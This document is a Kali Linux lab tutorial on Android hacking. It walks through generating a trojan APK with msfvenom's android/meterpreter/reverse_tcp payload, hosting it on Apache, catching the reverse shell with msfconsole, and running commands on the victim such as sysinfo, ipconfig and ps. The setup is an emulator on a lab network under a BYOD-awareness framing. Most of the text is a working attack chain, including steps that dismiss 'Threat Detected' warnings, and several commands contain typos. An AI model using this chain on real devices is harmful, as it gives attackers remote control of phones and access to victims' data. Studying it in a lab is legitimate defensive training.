Creating Binary Payloads in Kali Linux for Android Hacking
Advancements in technology have enabled Bring Your Own Device (BYOD) policies in the workplaces. Employees access business data and files from their personal devices. Although businesses apply network security and follow the best practices, hackers can exploit the mobile devices of employees to gain sensitive data of the company.
Here, we will understand how to find Trojan and backdoor attacks by creating a server and testing the devices on a network that can be attacked.
- Configure the IP address of the Android device. For this, open Android and click on the App drawer from the home screen.
- Click on the Terminal Emulator icon to open the terminal.
- Write su command and press Enter for attaining root terminal (super user).
It will show a Superuser Request pop-up. Choose Remember choice forever and click on Allow.
- Write ip addr add 10.10.10.69/24 dev eth0 and press Enter. It will assign 10.10.10.69 IP to the Android device. Close the terminal window and return to home after issuing an IP address.
- Open Kali Linux.
- Open Terminal.
- Write service postgresql start and press Enter to initiate the postgresql service.
- Write msfvenom -I and press Enter. This command will show the exploits available in the database.
- Here, the android/meterpreter/reverse_tcp is selected as the payload.
- Write msfvenom -p android/meterpreter/reverse_tcp –platform android -a dalvik LHOST=10.10.10.11R > Desktop/Backdoor.apk and press Enter.
It will create a Backdoor.apk app package file.
This file will be used as a malicious source spread through the internet. Here, we will share the file using web service.
- Send the backdoor.apk file to the target machine. Here Android emulator is the target machine.
- Write mkdir /var/www/html/share in the terminal and press Enter. It will create a new directory.
- Write chmod -R 755 /var/www/html/share and press Enter. It will change the mode of the share folder to 755.
- Write chown -R www-data:www-data/var/www/html/share and press Enter. The ownership of the folder will be changed to www-data.
- Write cp/root/Desktop/Backdoor.apk /var/www/share and press Enter.
- Write service apache2 start and press Enter.
- Write msfconsole and press Enter to open msfconsole.
- Write use exploit/multi/handler in msfconsole and press Enter. It will handle the exploits executed outside the framework.
- Now, write and issue the commands below in msfconsole:
- Write set payload android/meterpreter/reverse_tcp. Press Enter.
- Write set LHOST 10.10.10.11. Press Enter.
- Write show options and press Enter. The role of this command is to see the listening port.
- Write exploit -j -z and press Enter. The exploitation will start.
- Open Android machine and click on App Drawer icon.
- When Android apps show, open a web browser.
- Visit http://10.10.10.11/share. When the index of /share window comes, click on Backdoor.apk. It will download the application package file.
- When the Complete action using pop-up comes, choose ES Downloader and click on Always. The file will be downloaded successfully.
- When the Download pop-up comes, click on the Open file.
- When the Properties pop-up comes, click on Install.
If you see a Threat Detected pop-up, click on Continue.
- When the Select pop-up comes, click on Package Installer.
- When the MainActivity window comes, click on Next (two times).
- Click on Install.
- If the Threat Detected pop-up comes, click on Cancel.
- When the app is installed, click on Open.
- Open Kali Linux. You will see that the meterpreter session has started. This represents the success of the exploitation.
- Write sessions -i 1 command. Press Enter and it will launch the Meterpreter shell.
The Android machine will get inactive if and show a blank screen if you leave it idle. So, make sure to keep it active.
- Write sysinfo and press Enter. It will show the information of the victim machine, including computer name, OS, etc.
- Write ipconfig and press Enter. It will show the network information of the victim, including IP address, MAC address, etc.
- Write pwd and press Enter. It will show the current working directory.
- Write cd/sdcard and press Enter. It will change the current remote directory to sdcard.
- Write pwd and press Enter. It will show the working directory that you changed in the last step.
- Write ps and press Enter. It will show you the running processes in Android.
Hence, if an Android device and the user don’t follow the best practices, hackers can find sensitive information and complete control over the device. They can also do malicious activities.
- Close the windows in Android and Kali Linux after lab completion.